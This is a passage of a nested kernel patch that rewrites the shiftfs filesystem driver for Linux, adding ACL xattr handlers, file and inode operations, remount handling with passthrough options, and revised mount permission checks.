-+			break;
-+		}
-+	}
- }
- 
--static int shiftfs_show_options(struct seq_file *m, struct dentry *dentry)
-+static struct posix_acl *shiftfs_get_acl(struct inode *inode, int type)
- {
--	struct super_block *sb = dentry->d_sb;
--	struct shiftfs_super_info *ssi = sb->s_fs_info;
-+	struct inode *loweri = inode->i_private;
-+	const struct cred *oldcred;
-+	struct posix_acl *lower_acl, *acl = NULL;
-+	struct user_namespace *from_ns = loweri->i_sb->s_user_ns;
-+	struct user_namespace *to_ns = inode->i_sb->s_user_ns;
-+	int size;
-+	int err;
- 
--	if (ssi->mark)
--		seq_show_option(m, "mark", NULL);
-+	if (!IS_POSIXACL(loweri))
-+		return NULL;
- 
--	return 0;
--}
-+	oldcred = shiftfs_override_creds(inode->i_sb);
-+	lower_acl = get_acl(loweri, type);
-+	revert_creds(oldcred);
- 
--static int shiftfs_statfs(struct dentry *dentry, struct kstatfs *buf)
--{
--	struct super_block *sb = dentry->d_sb;
--	struct shiftfs_super_info *ssi = sb->s_fs_info;
--	struct dentry *root = sb->s_root;
--	struct dentry *realroot = root->d_fsdata;
--	struct path realpath = { .mnt = ssi->mnt, .dentry = realroot };
--	int err;
-+	if (lower_acl && !IS_ERR(lower_acl)) {
-+		/* XXX: export posix_acl_clone? */
-+		size = sizeof(struct posix_acl) +
-+		       lower_acl->a_count * sizeof(struct posix_acl_entry);
-+		acl = kmemdup(lower_acl, size, GFP_KERNEL);
-+		posix_acl_release(lower_acl);
- 
--	err = vfs_statfs(&realpath, buf);
--	if (err)
--		return err;
-+		if (!acl)
-+			return ERR_PTR(-ENOMEM);
- 
--	buf->f_type = sb->s_magic;
-+		refcount_set(&acl->a_refcount, 1);
- 
--	return 0;
-+		err = shift_acl_ids(from_ns, to_ns, acl);
-+		if (err) {
-+			kfree(acl);
-+			return ERR_PTR(err);
-+		}
-+	}
-+
-+	return acl;
- }
- 
--static void shiftfs_put_super(struct super_block *sb)
-+static int
-+shiftfs_posix_acl_xattr_get(const struct xattr_handler *handler,
-+			   struct dentry *dentry, struct inode *inode,
-+			   const char *name, void *buffer, size_t size)
- {
--	struct shiftfs_super_info *ssi = sb->s_fs_info;
-+	struct inode *loweri = inode->i_private;
-+	int ret;
-+
-+	ret = shiftfs_xattr_get(NULL, dentry, inode, handler->name,
-+				buffer, size);
-+	if (ret < 0)
-+		return ret;
- 
--	mntput(ssi->mnt);
--	put_user_ns(ssi->userns);
--	kfree(ssi);
-+	inode_lock(loweri);
-+	shift_acl_xattr_ids(loweri->i_sb->s_user_ns, inode->i_sb->s_user_ns,
-+			    buffer, size);
-+	inode_unlock(loweri);
-+	return ret;
- }
- 
--static const struct xattr_handler shiftfs_xattr_handler = {
--	.prefix = "",
--	.get    = shiftfs_xattr_get,
--	.set    = shiftfs_xattr_set,
--};
-+static int
-+shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler,
-+			    struct dentry *dentry, struct inode *inode,
-+			    const char *name, const void *value,
-+			    size_t size, int flags)
-+{
-+	struct inode *loweri = inode->i_private;
-+	int err;
- 
--const struct xattr_handler *shiftfs_xattr_handlers[] = {
--	&shiftfs_xattr_handler,
--	NULL
--};
-+	if (!IS_POSIXACL(loweri) || !loweri->i_op->set_acl)
-+		return -EOPNOTSUPP;
-+	if (handler->flags == ACL_TYPE_DEFAULT && !S_ISDIR(inode->i_mode))
-+		return value ? -EACCES : 0;
-+	if (!inode_owner_or_capable(inode))
-+		return -EPERM;
-+
-+	if (value) {
-+		shift_acl_xattr_ids(inode->i_sb->s_user_ns,
-+				    loweri->i_sb->s_user_ns,
-+				    (void *)value, size);
-+		err = shiftfs_setxattr(dentry, inode, handler->name, value,
-+				       size, flags);
-+	} else {
-+		err = shiftfs_removexattr(dentry, handler->name);
-+	}
- 
--static const struct super_operations shiftfs_super_ops = {
--	.put_super	= shiftfs_put_super,
--	.show_options	= shiftfs_show_options,
--	.statfs		= shiftfs_statfs,
-+	if (!err)
-+		shiftfs_copyattr(loweri, inode);
-+
-+	return err;
-+}
-+
-+static const struct xattr_handler
-+shiftfs_posix_acl_access_xattr_handler = {
-+	.name = XATTR_NAME_POSIX_ACL_ACCESS,
-+	.flags = ACL_TYPE_ACCESS,
-+	.get = shiftfs_posix_acl_xattr_get,
-+	.set = shiftfs_posix_acl_xattr_set,
- };
- 
--struct shiftfs_data {
--	void *data;
--	const char *path;
-+static const struct xattr_handler
-+shiftfs_posix_acl_default_xattr_handler = {
-+	.name = XATTR_NAME_POSIX_ACL_DEFAULT,
-+	.flags = ACL_TYPE_DEFAULT,
-+	.get = shiftfs_posix_acl_xattr_get,
-+	.set = shiftfs_posix_acl_xattr_set,
- };
- 
--static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
--			      int silent)
--{
--	struct shiftfs_data *data = raw_data;
--	char *name = kstrdup(data->path, GFP_KERNEL);
--	int err = -ENOMEM;
--	struct shiftfs_super_info *ssi = NULL;
--	struct path path;
--	struct dentry *dentry;
-+#else /* !CONFIG_SHIFT_FS_POSIX_ACL */
- 
--	if (!name)
--		goto out;
-+#define shiftfs_get_acl NULL
- 
--	ssi = kzalloc(sizeof(*ssi), GFP_KERNEL);
--	if (!ssi)
--		goto out;
-+#endif /* CONFIG_SHIFT_FS_POSIX_ACL */
- 
--	err = -EPERM;
--	err = shiftfs_parse_options(ssi, data->data);
-+static const struct inode_operations shiftfs_dir_inode_operations = {
-+	.lookup		= shiftfs_lookup,
-+	.mkdir		= shiftfs_mkdir,
-+	.symlink	= shiftfs_symlink,
-+	.unlink		= shiftfs_unlink,
-+	.rmdir		= shiftfs_rmdir,
-+	.rename		= shiftfs_rename,
-+	.link		= shiftfs_link,
-+	.setattr	= shiftfs_setattr,
-+	.create		= shiftfs_create,
-+	.mknod		= shiftfs_mknod,
-+	.permission	= shiftfs_permission,
-+	.getattr	= shiftfs_getattr,
-+	.listxattr	= shiftfs_listxattr,
-+	.get_acl	= shiftfs_get_acl,
-+};
-+
-+static const struct inode_operations shiftfs_file_inode_operations = {
-+	.fiemap		= shiftfs_fiemap,
-+	.getattr	= shiftfs_getattr,
-+	.get_acl	= shiftfs_get_acl,
-+	.listxattr	= shiftfs_listxattr,
-+	.permission	= shiftfs_permission,
-+	.setattr	= shiftfs_setattr,
-+	.tmpfile	= shiftfs_tmpfile,
-+};
-+
-+static const struct inode_operations shiftfs_special_inode_operations = {
-+	.getattr	= shiftfs_getattr,
-+	.get_acl	= shiftfs_get_acl,
-+	.listxattr	= shiftfs_listxattr,
-+	.permission	= shiftfs_permission,
-+	.setattr	= shiftfs_setattr,
-+};
-+
-+static const struct inode_operations shiftfs_symlink_inode_operations = {
-+	.getattr	= shiftfs_getattr,
-+	.get_link	= shiftfs_get_link,
-+	.listxattr	= shiftfs_listxattr,
-+	.setattr	= shiftfs_setattr,
-+};
-+
-+static struct file *shiftfs_open_realfile(const struct file *file,
-+					  struct path *realpath)
-+{
-+	struct file *lowerf;
-+	const struct cred *oldcred;
-+	struct inode *inode = file_inode(file);
-+	struct inode *loweri = realpath->dentry->d_inode;
-+	struct shiftfs_super_info *info = inode->i_sb->s_fs_info;
-+
-+	oldcred = shiftfs_override_creds(inode->i_sb);
-+	/* XXX: open_with_fake_path() not gauranteed to stay around, if
-+	 * removed use dentry_open() */
-+	lowerf = open_with_fake_path(realpath, file->f_flags, loweri, info->creator_cred);
-+	revert_creds(oldcred);
-+
-+	return lowerf;
-+}
-+
-+#define SHIFTFS_SETFL_MASK (O_APPEND | O_NONBLOCK | O_NDELAY | O_DIRECT)
-+
-+static int shiftfs_change_flags(struct file *file, unsigned int flags)
-+{
-+	struct inode *inode = file_inode(file);
-+	int err;
-+
-+	/* if some flag changed that cannot be changed then something's amiss */
-+	if (WARN_ON((file->f_flags ^ flags) & ~SHIFTFS_SETFL_MASK))
-+		return -EIO;
-+
-+	flags &= SHIFTFS_SETFL_MASK;
-+
-+	if (((flags ^ file->f_flags) & O_APPEND) && IS_APPEND(inode))
-+		return -EPERM;
-+
-+	if (flags & O_DIRECT) {
-+		if (!file->f_mapping->a_ops ||
-+		    !file->f_mapping->a_ops->direct_IO)
-+			return -EINVAL;
-+	}
-+
-+	if (file->f_op->check_flags) {
-+		err = file->f_op->check_flags(flags);
-+		if (err)
-+			return err;
-+	}
-+
-+	spin_lock(&file->f_lock);
-+	file->f_flags = (file->f_flags & ~SHIFTFS_SETFL_MASK) | flags;
-+	spin_unlock(&file->f_lock);
-+
-+	return 0;
-+}
-+
-+static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
-+{
-+	struct shiftfs_file_info *file_info = file->private_data;
-+	struct file *realfile = file_info->realfile;
-+
-+	lowerfd->flags = 0;
-+	lowerfd->file = realfile;
-+
-+	/* Did the flags change since open? */
-+	if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
-+		return shiftfs_change_flags(lowerfd->file, file->f_flags);
-+
-+	return 0;
-+}
-+
-+static int shiftfs_open(struct inode *inode, struct file *file)
-+{
-+	struct shiftfs_super_info *ssi = inode->i_sb->s_fs_info;
-+	struct shiftfs_file_info *file_info;
-+	struct file *realfile;
-+	struct path *realpath;
-+
-+	file_info = kmem_cache_zalloc(shiftfs_file_info_cache, GFP_KERNEL);
-+	if (!file_info)
-+		return -ENOMEM;
-+
-+	realpath = &file_info->realpath;
-+	realpath->mnt = ssi->mnt;
-+	realpath->dentry = file->f_path.dentry->d_fsdata;
-+
-+	realfile = shiftfs_open_realfile(file, realpath);
-+	if (IS_ERR(realfile)) {
-+		kmem_cache_free(shiftfs_file_info_cache, file_info);
-+		return PTR_ERR(realfile);
-+	}
-+
-+	file->private_data = file_info;
-+	file_info->realfile = realfile;
-+	return 0;
-+}
-+
-+static int shiftfs_release(struct inode *inode, struct file *file)
-+{
-+	struct shiftfs_file_info *file_info = file->private_data;
-+
-+	if (file_info) {
-+		if (file_info->realfile)
-+			fput(file_info->realfile);
-+
-+		kmem_cache_free(shiftfs_file_info_cache, file_info);
-+	}
-+
-+	return 0;
-+}
-+
-+static loff_t shiftfs_llseek(struct file *file, loff_t offset, int whence)
-+{
-+	struct inode *realinode = file_inode(file)->i_private;
-+
-+	return generic_file_llseek_size(file, offset, whence,
-+					realinode->i_sb->s_maxbytes,
-+					i_size_read(realinode));
-+}
-+
-+/* XXX: Need to figure out what to to about atime updates, maybe other
-+ * timestamps too ... ref. ovl_file_accessed() */
-+
-+static rwf_t shiftfs_iocb_to_rwf(struct kiocb *iocb)
-+{
-+	int ifl = iocb->ki_flags;
-+	rwf_t flags = 0;
-+
-+	if (ifl & IOCB_NOWAIT)
-+		flags |= RWF_NOWAIT;
-+	if (ifl & IOCB_HIPRI)
-+		flags |= RWF_HIPRI;
-+	if (ifl & IOCB_DSYNC)
-+		flags |= RWF_DSYNC;
-+	if (ifl & IOCB_SYNC)
-+		flags |= RWF_SYNC;
-+
-+	return flags;
-+}
-+
-+static ssize_t shiftfs_read_iter(struct kiocb *iocb, struct iov_iter *iter)
-+{
-+	struct file *file = iocb->ki_filp;
-+	struct fd lowerfd;
-+	const struct cred *oldcred;
-+	ssize_t ret;
-+
-+	if (!iov_iter_count(iter))
-+		return 0;
-+
-+	ret = shiftfs_real_fdget(file, &lowerfd);
-+	if (ret)
-+		return ret;
-+
-+	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
-+	ret = vfs_iter_read(lowerfd.file, iter, &iocb->ki_pos,
-+			    shiftfs_iocb_to_rwf(iocb));
-+	revert_creds(oldcred);
-+
-+	shiftfs_file_accessed(file);
-+
-+	fdput(lowerfd);
-+	return ret;
-+}
-+
-+static ssize_t shiftfs_write_iter(struct kiocb *iocb, struct iov_iter *iter)
-+{
-+	struct file *file = iocb->ki_filp;
-+	struct inode *inode = file_inode(file);
-+	struct fd lowerfd;
-+	const struct cred *oldcred;
-+	ssize_t ret;
-+
-+	if (!iov_iter_count(iter))
-+		return 0;
-+
-+	inode_lock(inode);
-+	/* Update mode */
-+	shiftfs_copyattr(inode->i_private, inode);
-+	ret = file_remove_privs(file);
-+	if (ret)
-+		goto out_unlock;
-+
-+	ret = shiftfs_real_fdget(file, &lowerfd);
-+	if (ret)
-+		goto out_unlock;
-+
-+	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
-+	file_start_write(lowerfd.file);
-+	ret = vfs_iter_write(lowerfd.file, iter, &iocb->ki_pos,
-+			     shiftfs_iocb_to_rwf(iocb));
-+	file_end_write(lowerfd.file);
-+	revert_creds(oldcred);
-+
-+	/* Update size */
-+	shiftfs_copyattr(inode->i_private, inode);
-+
-+	fdput(lowerfd);
-+
-+out_unlock:
-+	inode_unlock(inode);
-+	return ret;
-+}
-+
-+static int shiftfs_fsync(struct file *file, loff_t start, loff_t end,
-+			 int datasync)
-+{
-+	struct fd lowerfd;
-+	const struct cred *oldcred;
-+	int ret;
-+
-+	ret = shiftfs_real_fdget(file, &lowerfd);
-+	if (ret)
-+		return ret;
-+
-+	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
-+	ret = vfs_fsync_range(lowerfd.file, start, end, datasync);
-+	revert_creds(oldcred);
-+
-+	fdput(lowerfd);
-+	return ret;
-+}
-+
-+static int shiftfs_mmap(struct file *file, struct vm_area_struct *vma)
-+{
-+	struct shiftfs_file_info *file_info = file->private_data;
-+	struct file *realfile = file_info->realfile;
-+	const struct cred *oldcred;
-+	int ret;
-+
-+	if (!realfile->f_op->mmap)
-+		return -ENODEV;
-+
-+	if (WARN_ON(file != vma->vm_file))
-+		return -EIO;
-+
-+	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
-+	vma->vm_file = get_file(realfile);
-+	ret = call_mmap(vma->vm_file, vma);
-+	revert_creds(oldcred);
-+
-+	shiftfs_file_accessed(file);
-+
-+	if (ret)
-+		fput(realfile); /* Drop refcount from new vm_file value */
-+	else
-+		fput(file); /* Drop refcount from previous vm_file value */
-+
-+	return ret;
-+}
-+
-+static long shiftfs_fallocate(struct file *file, int mode, loff_t offset,
-+			      loff_t len)
-+{
-+	struct inode *inode = file_inode(file);
-+	struct inode *loweri = inode->i_private;
-+	struct fd lowerfd;
-+	const struct cred *oldcred;
-+	int ret;
-+
-+	ret = shiftfs_real_fdget(file, &lowerfd);
-+	if (ret)
-+		return ret;
-+
-+	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
-+	ret = vfs_fallocate(lowerfd.file, mode, offset, len);
-+	revert_creds(oldcred);
-+
-+	/* Update size */
-+	shiftfs_copyattr(loweri, inode);
-+
-+	fdput(lowerfd);
-+	return ret;
-+}
-+
-+static int shiftfs_fadvise(struct file *file, loff_t offset, loff_t len,
-+			   int advice)
-+{
-+	struct fd lowerfd;
-+	const struct cred *oldcred;
-+	int ret;
-+
-+	ret = shiftfs_real_fdget(file, &lowerfd);
-+	if (ret)
-+		return ret;
-+
-+	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
-+	ret = vfs_fadvise(lowerfd.file, offset, len, advice);
-+	revert_creds(oldcred);
-+
-+	fdput(lowerfd);
-+	return ret;
-+}
-+
-+static int shiftfs_override_ioctl_creds(const struct super_block *sb,
-+					const struct cred **oldcred,
-+					struct cred **newcred)
-+{
-+	kuid_t fsuid = current_fsuid();
-+	kgid_t fsgid = current_fsgid();
-+
-+	*oldcred = shiftfs_override_creds(sb);
-+
-+	*newcred = prepare_creds();
-+	if (!*newcred) {
-+		revert_creds(*oldcred);
-+		return -ENOMEM;
-+	}
-+
-+	(*newcred)->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, fsuid));
-+	(*newcred)->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, fsgid));
-+
-+	/* clear all caps to prevent bypassing capable() checks */
-+	cap_clear((*newcred)->cap_bset);
-+	cap_clear((*newcred)->cap_effective);
-+	cap_clear((*newcred)->cap_inheritable);
-+	cap_clear((*newcred)->cap_permitted);
-+
-+	put_cred(override_creds(*newcred));
-+	return 0;
-+}
-+
-+static inline void shiftfs_revert_ioctl_creds(const struct cred *oldcred,
-+					      struct cred *newcred)
-+{
-+	return shiftfs_revert_object_creds(oldcred, newcred);
-+}
-+
-+static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
-+			       unsigned long arg)
-+{
-+	long ret = 0;
-+	struct fd lowerfd;
-+	struct cred *newcred;
-+	const struct cred *oldcred;
-+	struct super_block *sb = file->f_path.dentry->d_sb;
-+
-+	ret = shiftfs_real_fdget(file, &lowerfd);
-+	if (ret)
-+		return ret;
-+
-+	ret = shiftfs_override_ioctl_creds(sb, &oldcred, &newcred);
-+	if (ret)
-+		goto out_fdput;
-+
-+	ret = vfs_ioctl(lowerfd.file, cmd, arg);
-+
-+	shiftfs_revert_ioctl_creds(oldcred, newcred);
-+
-+	shiftfs_copyattr(file_inode(lowerfd.file), file_inode(file));
-+	shiftfs_copyflags(file_inode(lowerfd.file), file_inode(file));
-+
-+out_fdput:
-+	fdput(lowerfd);
-+
-+	return ret;
-+}
-+
-+static long shiftfs_ioctl(struct file *file, unsigned int cmd,
-+			  unsigned long arg)
-+{
-+	switch (cmd) {
-+	case FS_IOC_GETVERSION:
-+		/* fall through */
-+	case FS_IOC_GETFLAGS:
-+		/* fall through */
-+	case FS_IOC_SETFLAGS:
-+		break;
-+	default:
-+		return -ENOTTY;
-+	}
-+
-+	return shiftfs_real_ioctl(file, cmd, arg);
-+}
-+
-+static long shiftfs_compat_ioctl(struct file *file, unsigned int cmd,
-+				 unsigned long arg)
-+{
-+	switch (cmd) {
-+	case FS_IOC32_GETVERSION:
-+		/* fall through */
-+	case FS_IOC32_GETFLAGS:
-+		/* fall through */
-+	case FS_IOC32_SETFLAGS:
-+		break;
-+	default:
-+		return -ENOIOCTLCMD;
-+	}
-+
-+	return shiftfs_real_ioctl(file, cmd, arg);
-+}
-+
-+enum shiftfs_copyop {
-+	SHIFTFS_COPY,
-+	SHIFTFS_CLONE,
-+	SHIFTFS_DEDUPE,
-+};
-+
-+static ssize_t shiftfs_copyfile(struct file *file_in, loff_t pos_in,
-+				struct file *file_out, loff_t pos_out, u64 len,
-+				unsigned int flags, enum shiftfs_copyop op)
-+{
-+	ssize_t ret;
-+	struct fd real_in, real_out;
-+	const struct cred *oldcred;
-+	struct inode *inode_out = file_inode(file_out);
-+	struct inode *loweri = inode_out->i_private;
-+
-+	ret = shiftfs_real_fdget(file_out, &real_out);
-+	if (ret)
-+		return ret;
-+
-+	ret = shiftfs_real_fdget(file_in, &real_in);
-+	if (ret) {
-+		fdput(real_out);
-+		return ret;
-+	}
-+
-+	oldcred = shiftfs_override_creds(inode_out->i_sb);
-+	switch (op) {
-+	case SHIFTFS_COPY:
-+		ret = vfs_copy_file_range(real_in.file, pos_in, real_out.file,
-+					  pos_out, len, flags);
-+		break;
-+
-+	case SHIFTFS_CLONE:
-+		ret = vfs_clone_file_range(real_in.file, pos_in, real_out.file,
-+					   pos_out, len, flags);
-+		break;
-+
-+	case SHIFTFS_DEDUPE:
-+		ret = vfs_dedupe_file_range_one(real_in.file, pos_in,
-+						real_out.file, pos_out, len,
-+						flags);
-+		break;
-+	}
-+	revert_creds(oldcred);
-+
-+	/* Update size */
-+	shiftfs_copyattr(loweri, inode_out);
-+
-+	fdput(real_in);
-+	fdput(real_out);
-+
-+	return ret;
-+}
-+
-+static ssize_t shiftfs_copy_file_range(struct file *file_in, loff_t pos_in,
-+				       struct file *file_out, loff_t pos_out,
-+				       size_t len, unsigned int flags)
-+{
-+	return shiftfs_copyfile(file_in, pos_in, file_out, pos_out, len, flags,
-+				SHIFTFS_COPY);
-+}
-+
-+static loff_t shiftfs_remap_file_range(struct file *file_in, loff_t pos_in,
-+				       struct file *file_out, loff_t pos_out,
-+				       loff_t len, unsigned int remap_flags)
-+{
-+	enum shiftfs_copyop op;
-+
-+	if (remap_flags & ~(REMAP_FILE_DEDUP | REMAP_FILE_ADVISORY))
-+		return -EINVAL;
-+
-+	if (remap_flags & REMAP_FILE_DEDUP)
-+		op = SHIFTFS_DEDUPE;
-+	else
-+		op = SHIFTFS_CLONE;
-+
-+	return shiftfs_copyfile(file_in, pos_in, file_out, pos_out, len,
-+				remap_flags, op);
-+}
-+
-+static int shiftfs_iterate_shared(struct file *file, struct dir_context *ctx)
-+{
-+	const struct cred *oldcred;
-+	int err = -ENOTDIR;
-+	struct shiftfs_file_info *file_info = file->private_data;
-+	struct file *realfile = file_info->realfile;
-+
-+	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
-+	err = iterate_dir(realfile, ctx);
-+	revert_creds(oldcred);
-+
-+	return err;
-+}
-+
-+const struct file_operations shiftfs_file_operations = {
-+	.open			= shiftfs_open,
-+	.release		= shiftfs_release,
-+	.llseek			= shiftfs_llseek,
-+	.read_iter		= shiftfs_read_iter,
-+	.write_iter		= shiftfs_write_iter,
-+	.fsync			= shiftfs_fsync,
-+	.mmap			= shiftfs_mmap,
-+	.fallocate		= shiftfs_fallocate,
-+	.fadvise		= shiftfs_fadvise,
-+	.unlocked_ioctl		= shiftfs_ioctl,
-+	.compat_ioctl		= shiftfs_compat_ioctl,
-+	.copy_file_range	= shiftfs_copy_file_range,
-+	.remap_file_range	= shiftfs_remap_file_range,
-+};
-+
-+const struct file_operations shiftfs_dir_operations = {
-+	.compat_ioctl		= shiftfs_compat_ioctl,
-+	.fsync			= shiftfs_fsync,
-+	.iterate_shared		= shiftfs_iterate_shared,
-+	.llseek			= shiftfs_llseek,
-+	.open			= shiftfs_open,
-+	.read			= generic_read_dir,
-+	.release		= shiftfs_release,
-+	.unlocked_ioctl		= shiftfs_ioctl,
-+};
-+
-+static const struct address_space_operations shiftfs_aops = {
-+	/* For O_DIRECT dentry_open() checks f_mapping->a_ops->direct_IO */
-+	.direct_IO	= noop_direct_IO,
-+};
-+
-+static void shiftfs_fill_inode(struct inode *inode, unsigned long ino,
-+			       umode_t mode, dev_t dev, struct dentry *dentry)
-+{
-+	struct inode *loweri;
-+
-+	inode->i_ino = ino;
-+	inode->i_flags |= S_NOCMTIME;
-+
-+	mode &= S_IFMT;
-+	inode->i_mode = mode;
-+	switch (mode & S_IFMT) {
-+	case S_IFDIR:
-+		inode->i_op = &shiftfs_dir_inode_operations;
-+		inode->i_fop = &shiftfs_dir_operations;
-+		break;
-+	case S_IFLNK:
-+		inode->i_op = &shiftfs_symlink_inode_operations;
-+		break;
-+	case S_IFREG:
-+		inode->i_op = &shiftfs_file_inode_operations;
-+		inode->i_fop = &shiftfs_file_operations;
-+		inode->i_mapping->a_ops = &shiftfs_aops;
-+		break;
-+	default:
-+		inode->i_op = &shiftfs_special_inode_operations;
-+		init_special_inode(inode, mode, dev);
-+		break;
-+	}
-+
-+	if (!dentry)
-+		return;
-+
-+	loweri = dentry->d_inode;
-+	if (!loweri->i_op->get_link)
-+		inode->i_opflags |= IOP_NOFOLLOW;
-+
-+	shiftfs_copyattr(loweri, inode);
-+	shiftfs_copyflags(loweri, inode);
-+	set_nlink(inode, loweri->i_nlink);
-+}
-+
-+static int shiftfs_show_options(struct seq_file *m, struct dentry *dentry)
-+{
-+	struct super_block *sb = dentry->d_sb;
-+	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
-+
-+	if (sbinfo->mark)
-+		seq_show_option(m, "mark", NULL);
-+
-+	if (sbinfo->passthrough)
-+		seq_printf(m, ",passthrough=%u", sbinfo->passthrough);
-+
-+	return 0;
-+}
-+
-+static int shiftfs_statfs(struct dentry *dentry, struct kstatfs *buf)
-+{
-+	struct super_block *sb = dentry->d_sb;
-+	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
-+	struct dentry *root = sb->s_root;
-+	struct dentry *realroot = root->d_fsdata;
-+	struct path realpath = { .mnt = sbinfo->mnt, .dentry = realroot };
-+	int err;
-+
-+	err = vfs_statfs(&realpath, buf);
- 	if (err)
--		goto out;
-+		return err;
- 
--	/* to mark a mount point, must be real root */
--	if (ssi->mark && !capable(CAP_SYS_ADMIN))
--		goto out;
-+	if (!shiftfs_passthrough_statfs(sbinfo))
-+		buf->f_type = sb->s_magic;
- 
--	/* else to mount a mark, must be userns admin */
--	if (!ssi->mark && !ns_capable(current_user_ns(), CAP_SYS_ADMIN))
--		goto out;
-+	return 0;
-+}
- 
--	err = kern_path(name, LOOKUP_FOLLOW, &path);
-+static void shiftfs_evict_inode(struct inode *inode)
-+{
-+	struct inode *loweri = inode->i_private;
-+
-+	clear_inode(inode);
-+
-+	if (loweri)
-+		iput(loweri);
-+}
-+
-+static void shiftfs_put_super(struct super_block *sb)
-+{
-+	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
-+
-+	if (sbinfo) {
-+		mntput(sbinfo->mnt);
-+		put_cred(sbinfo->creator_cred);
-+		kfree(sbinfo);
-+	}
-+}
-+
-+static const struct xattr_handler shiftfs_xattr_handler = {
-+	.prefix = "",
-+	.get    = shiftfs_xattr_get,
-+	.set    = shiftfs_xattr_set,
-+};
-+
-+const struct xattr_handler *shiftfs_xattr_handlers[] = {
-+#ifdef CONFIG_SHIFT_FS_POSIX_ACL
-+	&shiftfs_posix_acl_access_xattr_handler,
-+	&shiftfs_posix_acl_default_xattr_handler,
-+#endif
-+	&shiftfs_xattr_handler,
-+	NULL
-+};
-+
-+static inline bool passthrough_is_subset(int old_flags, int new_flags)
-+{
-+	if ((new_flags & old_flags) != new_flags)
-+		return false;
-+
-+	return true;
-+}
-+
-+static int shiftfs_remount(struct super_block *sb, int *flags, char *data)
-+{
-+	int err;
-+	struct shiftfs_super_info new = {};
-+	struct shiftfs_super_info *info = sb->s_fs_info;
-+
-+	err = shiftfs_parse_mount_options(&new, data);
- 	if (err)
--		goto out;
-+		return err;
-+
-+	/* Mark mount option cannot be changed. */
-+	if (info->mark || (info->mark != new.mark))
-+		return -EPERM;
-+
-+	if (info->passthrough != new.passthrough) {
-+		/* Don't allow exceeding passthrough options of mark mount. */
-+		if (!passthrough_is_subset(info->info_mark->passthrough,
-+					   info->passthrough))
-+			return -EPERM;
-+
-+		info->passthrough = new.passthrough;
-+	}
-+
-+	return 0;
-+}
- 
--	err = -EPERM;
-+static const struct super_operations shiftfs_super_ops = {
-+	.put_super	= shiftfs_put_super,
-+	.show_options	= shiftfs_show_options,
-+	.statfs		= shiftfs_statfs,
-+	.remount_fs	= shiftfs_remount,
-+	.evict_inode	= shiftfs_evict_inode,
-+};
-+
-+struct shiftfs_data {
-+	void *data;
-+	const char *path;
-+};
-+
-+static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
-+			      int silent)
-+{
-+	int err;
-+	struct path path = {};
-+	struct shiftfs_super_info *sbinfo_mp;
-+	char *name = NULL;
-+	struct inode *inode = NULL;
-+	struct dentry *dentry = NULL;
-+	struct shiftfs_data *data = raw_data;
-+	struct shiftfs_super_info *sbinfo = NULL;
-+
-+	if (!data->path)
-+		return -EINVAL;
-+
-+	sb->s_fs_info = kzalloc(sizeof(*sbinfo), GFP_KERNEL);
-+	if (!sb->s_fs_info)
-+		return -ENOMEM;
-+	sbinfo = sb->s_fs_info;
-+
-+	err = shiftfs_parse_mount_options(sbinfo, data->data);
-+	if (err)
-+		return err;
-+
-+	/* to mount a mark, must be userns admin */
-+	if (!sbinfo->mark && !ns_capable(current_user_ns(), CAP_SYS_ADMIN))
-+		return -EPERM;
-+
-+	name = kstrdup(data->path, GFP_KERNEL);
-+	if (!name)
-+		return -ENOMEM;
-+
-+	err = kern_path(name, LOOKUP_FOLLOW, &path);
-+	if (err)
-+		goto out_free_name;
- 
- 	if (!S_ISDIR(path.dentry->d_inode->i_mode)) {
- 		err = -ENOTDIR;
--		goto out_put;
-+		goto out_put_path;
- 	}
- 
--	sb->s_stack_depth = path.dentry->d_sb->s_stack_depth + 1;
--	if (sb->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) {
--		printk(KERN_ERR "shiftfs: maximum stacking depth exceeded\n");
--		err = -EINVAL;
--		goto out_put;
--	}
-+	if (sbinfo->mark) {
-+		struct super_block *lower_sb = path.mnt->mnt_sb;
-+
-+		/* to mark a mount point, must root wrt lower s_user_ns */
-+		if (!ns_capable(lower_sb->s_user_ns, CAP_SYS_ADMIN)) {
-+			err = -EPERM;
-+			goto out_put_path;
-+		}
- 
--	if (ssi->mark) {
- 		/*
- 		 * this part is visible unshifted, so make sure no
- 		 * executables that could be used to give suid
- 		 * privileges
- 		 */
- 		sb->s_iflags = SB_I_NOEXEC;
--		ssi->mnt = path.mnt;
--		dentry = path.dentry;
--	} else {
--		struct shiftfs_super_info *mp_ssi;
- 
- 		/*
--		 * this leg executes if we're admin capable in
--		 * the namespace, so be very careful
-+		 * Handle nesting of shiftfs mounts by referring this mark
-+		 * mount back to the original mark mount. This is more
-+		 * efficient and alleviates concerns about stack depth.
- 		 */
-+		if (lower_sb->s_magic == SHIFTFS_MAGIC) {
-+			sbinfo_mp = lower_sb->s_fs_info;
-+
-+			/* Doesn't make sense to mark a mark mount */
-+			if (sbinfo_mp->mark) {
-+				err = -EINVAL;
-+				goto out_put_path;
-+			}
-+
-+			if (!passthrough_is_subset(sbinfo_mp->passthrough,
-+						   sbinfo->passthrough)) {
-+				err = -EPERM;
-+				goto out_put_path;
-+			}
-+
-+			sbinfo->mnt = mntget(sbinfo_mp->mnt);
-+			dentry = dget(path.dentry->d_fsdata);
-+		} else {
-+			sbinfo->mnt = mntget(path.mnt);
-+			dentry = dget(path.dentry);
-+		}
-+
-+		sbinfo->creator_cred = prepare_creds();
-+		if (!sbinfo->creator_cred) {
-+			err = -ENOMEM;
-+			goto out_put_path;
-+		}
-+	} else {
-+		/*
-+		 * This leg executes if we're admin capable in the namespace,
-+		 * so be very careful.
-+		 */
-+		err = -EPERM;
- 		if (path.dentry->d_sb->s_magic != SHIFTFS_MAGIC)
